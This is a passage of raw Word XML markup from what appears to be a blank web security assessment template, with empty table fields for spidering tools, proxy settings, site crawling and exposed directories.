            </w:r>
            <w:r w:rsidRPr="009A5267">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F4FEF3" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EE56FE3" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43025FD6" w14:textId="77777777" w:rsidR="00B12769" w:rsidRDefault="00B12769" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00503B20" w14:paraId="343FC21C" w14:textId="77777777" w:rsidTr="003D68CE">
        <w:trPr>
          <w:trHeight w:val="1007"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06B7066D" w14:textId="7E2C61A5" w:rsidR="00503B20" w:rsidRPr="00960A4F" w:rsidRDefault="00503B20" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FE01D5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Web Spidering Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D8F0EE" w14:textId="380DC8AC" w:rsidR="00503B20" w:rsidRPr="00C54B08" w:rsidRDefault="00503B20" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tools/ Services Used</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F62D3DD" w14:textId="77777777" w:rsidR="00503B20" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D4653">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Burp Suite, ZAP, Custom Python Script, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26914DC0" w14:textId="77777777" w:rsidR="00503B20" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="346C27CD" w14:textId="1AA902AE" w:rsidR="00503B20" w:rsidRPr="008D4653" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00503B20" w14:paraId="29592ADA" w14:textId="77777777" w:rsidTr="00EA3EA7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6C60A67E" w14:textId="77777777" w:rsidR="00503B20" w:rsidRPr="00FE01D5" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52E00FFB" w14:textId="0083CC53" w:rsidR="00503B20" w:rsidRPr="00C54B08" w:rsidRDefault="00503B20" w:rsidP="00EA3EA7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Proxy Configuration Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63302BA0" w14:textId="77777777" w:rsidR="00503B20" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB56D6">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*If applicable, e.g., using ZAP/Burp as a proxy]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7721609F" w14:textId="77777777" w:rsidR="00503B20" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38A602C2" w14:textId="77777777" w:rsidR="00503B20" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78D1F2B6" w14:textId="16FB3343" w:rsidR="00503B20" w:rsidRPr="00DB56D6" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00503B20" w14:paraId="68DD5387" w14:textId="77777777" w:rsidTr="006552F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="43A56FBC" w14:textId="77777777" w:rsidR="00503B20" w:rsidRPr="00FE01D5" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CBC608E" w14:textId="5510A106" w:rsidR="00503B20" w:rsidRPr="00C54B08" w:rsidRDefault="00503B20" w:rsidP="006552F2">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>JavaScript &amp; Cookie Handling Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F50EA6" w14:textId="77777777" w:rsidR="00503B20" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidRPr="009E62CD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Enabled/Disabled during spidering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D0F896" w14:textId="6C8DED2B" w:rsidR="00503B20" w:rsidRPr="00DB56D6" w:rsidRDefault="00503B20" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A1782B" w14:paraId="0FABCBB1" w14:textId="77777777" w:rsidTr="00E51BEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3041BC41" w14:textId="67DFB9BE" w:rsidR="00A1782B" w:rsidRPr="00FE01D5" w:rsidRDefault="00A1782B" w:rsidP="00E51BEA">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1782B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Potential Security Risks Identified</w:t>
            </w:r>
            <w:r w:rsidRPr="00A1782B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="785FD643" w14:textId="77777777" w:rsidR="00A1782B" w:rsidRPr="00C54B08" w:rsidRDefault="00A1782B" w:rsidP="00F42A02">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2FADAAD4" w14:textId="77777777" w:rsidR="00155E39" w:rsidRPr="00A51A96" w:rsidRDefault="00155E39" w:rsidP="00155E39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55E39" w14:paraId="171CF5FA" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="347F64E7" w14:textId="77777777" w:rsidR="00155E39" w:rsidRDefault="00155E39" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="164EBC40" w14:textId="77777777" w:rsidR="00155E39" w:rsidRDefault="00155E39" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="65989DEB" w14:textId="77777777" w:rsidR="00155E39" w:rsidRDefault="00155E39" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AEF22D4" w14:textId="77777777" w:rsidR="00155E39" w:rsidRDefault="00155E39" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3317EC6B" w14:textId="77777777" w:rsidR="00155E39" w:rsidRDefault="00155E39" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="37D590B3" w14:textId="77777777" w:rsidR="00155E39" w:rsidRDefault="00155E39" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="348D093C" w14:textId="77777777" w:rsidR="00265903" w:rsidRDefault="00265903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155E39" w:rsidRPr="000F3EF2" w14:paraId="09177BE1" w14:textId="77777777" w:rsidTr="00AD1B7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="63F6AB53" w14:textId="2CD6E3A2" w:rsidR="00155E39" w:rsidRPr="000F3EF2" w:rsidRDefault="00155E39" w:rsidP="008519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1.8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85288B" w:rsidRPr="0085288B">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Mirror and Crawl a Website to Identify its Files, Directories, and Folders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09BE48AC" w14:textId="77777777" w:rsidR="00155E39" w:rsidRPr="00AD1B7E" w:rsidRDefault="00155E39" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="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2857"/>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr w:rsidR="0097075B" w14:paraId="3DDDE024" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0028AA05" w14:textId="00CD9108" w:rsidR="0097075B" w:rsidRPr="00893B76" w:rsidRDefault="00FB6009" w:rsidP="0032770D">
            <w:pPr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B6009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Website URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="680C6079" w14:textId="77777777" w:rsidR="0097075B" w:rsidRDefault="0097075B" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB6009" w14:paraId="6DC96172" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C7310AA" w14:textId="7395114B" w:rsidR="00FB6009" w:rsidRPr="00FB6009" w:rsidRDefault="00FB6009" w:rsidP="0032770D">
            <w:pPr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B6009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Local Environment Setup </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7532" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="55530A92" w14:textId="5CF12138" w:rsidR="00FB6009" w:rsidRDefault="00FB6009" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*</w:t>
            </w:r>
            <w:r w:rsidR="00CD4E9F" w:rsidRPr="00CD4E9F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Virtual Machine, Sandbox, etc.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000340A3" w14:paraId="06F9D9D0" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69658B83" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0032770D">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00893B76">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Discovered Elements</w:t>
            </w:r>
            <w:r w:rsidRPr="006353B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77A61C38" w14:textId="770F13AE" w:rsidR="000340A3" w:rsidRPr="00C54B08" w:rsidRDefault="000340A3" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD4E9F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hidden/Unlinked Content Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A95854F" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1527F002" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="382F3B11" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000340A3" w14:paraId="77901F85" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3A25C3D9" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55D73A04" w14:textId="3EAF4D82" w:rsidR="000340A3" w:rsidRPr="00C54B08" w:rsidRDefault="000340A3" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD4E9F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Mapped Directory Structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD991A8" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01B5AA95" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="315DD3B9" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000340A3" w14:paraId="6A31E054" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6F1634D0" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41F50760" w14:textId="3AEDC5FB" w:rsidR="000340A3" w:rsidRPr="00C54B08" w:rsidRDefault="000340A3" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A73CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Preserved Content for Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7028B26F" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64522DE1" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3FB6FDC2" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000340A3" w14:paraId="140203DD" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1677E317" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="104FA467" w14:textId="54B02B4B" w:rsidR="000340A3" w:rsidRPr="00C54B08" w:rsidRDefault="000340A3" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A73CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Client-Side Validations &amp; Form Structures Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A62BBFD" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18D2B812" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66EC583D" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000340A3" w14:paraId="4A23C7F6" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2C5AF7C0" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2857" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="38DF38A6" w14:textId="3AC1673A" w:rsidR="000340A3" w:rsidRPr="00C54B08" w:rsidRDefault="000340A3" w:rsidP="0032770D">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A73CF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Sensitive Files, Directories, or Folders Exposed</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64892C3F" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DC2D8D5" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="668CFF1C" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000340A3" w14:paraId="0AB52C3A" w14:textId="77777777" w:rsidTr="0032770D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="256E24F9" w14:textId="77777777" w:rsidR="000340A3" w:rsidRDefault="000340A3" w:rsidP="0085194C">
            <w:pPr>
